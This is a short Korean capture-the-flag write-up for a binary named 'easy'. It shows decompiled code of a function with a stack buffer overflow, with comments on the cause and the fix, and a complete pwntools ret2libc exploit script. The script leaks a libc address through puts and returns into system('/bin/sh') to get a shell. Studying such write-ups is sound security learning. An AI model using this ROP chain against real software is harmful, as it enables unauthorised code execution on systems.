엄청 쉬운 문제인데 이상한 데서 막혀서 삽질했습니다.
/*
 * Decompiler output (IDA-style) for the vulnerable routine in ./easy.
 *
 * Gate: the global s1 must already hold a 0x20-byte value equal to the
 * constant at unk_602100, otherwise the process exits.  Which input path
 * fills s1 is not visible in this snippet.
 *
 * Defect: buf and v2 are two adjacent 8-byte locals (16 bytes in total,
 * buf at rbp-0x10), but read() may write up to 0x38 bytes starting at &buf.
 * Everything past the first 0x10 bytes lands on the saved rbp (8 bytes),
 * the saved return address (8 bytes) and 0x18 bytes above the frame.
 * The function also returns the raw byte count from read(), so a caller
 * gets no indication that the local area was exceeded.
 *
 * The source-level fix is to bound the read by the real buffer size
 * (sizeof of a proper char array) and treat the byte count as untrusted.
 * A stack canary (-fstack-protector) would turn this overwrite into an
 * abort instead of a controlled return; the fixed 0x400xxx addresses
 * quoted in the write-up suggest the binary was also built without PIE.
 */
ssize_t sub_400A76()
{
    __int64 buf; // [rsp+0h] [rbp-10h]  first 8 bytes of the 16-byte local area
    __int64 v2;  // [rsp+8h] [rbp-8h]   second 8 bytes, directly below saved rbp

    // Password-style gate: 0x20-byte compare of s1 against unk_602100;
    // any mismatch terminates the process.
    if ( memcmp(s1, &unk_602100, 0x20uLL) )
        exit(-1);
    buf = 0LL;
    v2 = 0LL;
    write(1, "> ", 2uLL);
    // BUG: 0x38-byte read into a 0x10-byte local area -> stack buffer overflow.
    // 0x38 - 0x10 = 0x28 bytes overwrite saved rbp, the return address and
    // 0x18 bytes beyond it.  The length must be bounded by the buffer size.
    return read(0, &buf, 0x38uLL); // overflow
}
대충 취약점이 터지는 함수.
너무 간단해서 조건만 맞춰주면 풀리는 문제입니다.
#!/usr/bin/env python2
#-*-coding:utf8-*-
# Write-up script for the `easy` CTF binary (Python 2 / pwntools).
#
# Root cause being exercised: sub_400A76 calls read(0, &buf, 0x38) into a
# 16-byte local area (buf at rbp-0x10).  0x10 bytes of locals plus 0x8 of
# saved rbp (0x18 total) reach the saved return address, and the remaining
# 0x38 - 0x18 = 0x20 bytes hold exactly four 8-byte words of return chain.
# The function is reached twice: the first pass prints puts@GOT through
# puts@PLT and returns to main, the second pass uses libc offsets derived
# from that leak to call system("/bin/sh").
#
# The hard-coded addresses below (main, pop rdi gadget) only hold for a
# non-PIE build, and every libc offset comes from the libc that pwntools
# resolves for the local binary (e.libc) -- the script assumes the target
# runs with that same libc.  A stack canary or PIE would defeat this exact
# chain; bounding the read to the buffer size is the actual fix.
from pwn import *
#context.log_level = 'debug'
r = process('./easy')
e = ELF('./easy')
libc = e.libc
puts_plt = e.plt['puts']   # PLT stub: prints whatever rdi points at
puts_got = e.got['puts']   # GOT slot holding the resolved libc address of puts
main = 0x400ADD            # return target after the leak so the function can be reached again
pop_rdi = 0x400BE3         # "pop rdi; ret" gadget, sets the first argument
# Menu walk that the author used to reach the "> " prompt of sub_400A76.
# Option 1 with 0x20 bytes presumably populates the s1 value checked by the
# memcmp gate; option 3 with 0x40 bytes and the value 4919 (0x1337) are the
# remaining steps the binary expects.  The menu semantics are not visible on
# this page -- TODO confirm against the binary.
r.sendlineafter('>', str(1))
r.sendlineafter('>', 'a'*0x20)
r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)
r.sendlineafter('>', str(4919))
# Stage 1 chain: 0x10 bytes of locals + 0x8 saved rbp, then four 8-byte
# words -- 0x38 bytes in total, exactly the read() bound.
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)     # rdi = puts@GOT
payload += p64(puts_got)
payload += p64(puts_plt)    # puts(puts@GOT) prints the runtime address of puts
payload += p64(main)        # back to main for the second pass
r.sendline(payload)
# Rebuild the 8-byte little-endian pointer from its 6 significant bytes.
# Assumes the leaked address ends in a 0x7f byte (the usual x86-64 libc
# mapping) and that the first 0x7f in the output belongs to the leak.
leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
base = leak - libc.symbols['puts']
system = base + libc.symbols['system']
binsh = base + libc.search('/bin/sh').next()   # Python 2 generator API
log.success('leak addr : {}'.format(hex(leak)))
log.success('base addr : {}'.format(hex(base)))
log.success('system addr : {}'.format(hex(system)))
log.success('binsh addr : {}'.format(hex(binsh)))
# Stage 2: same menu path minus the option-1 write (the s1 value apparently
# survives the return to main), same 0x18 bytes of padding, now returning
# into system("/bin/sh").
r.sendlineafter('>', str(3))
r.sendlineafter('>', 'a'*0x40)
r.sendlineafter('>', str(4919))
payload = 'a'*(0x10 + 0x8)
payload += p64(pop_rdi)     # rdi = pointer to "/bin/sh" inside libc
payload += p64(binsh)
payload += p64(system)
r.sendline(payload)
r.interactive()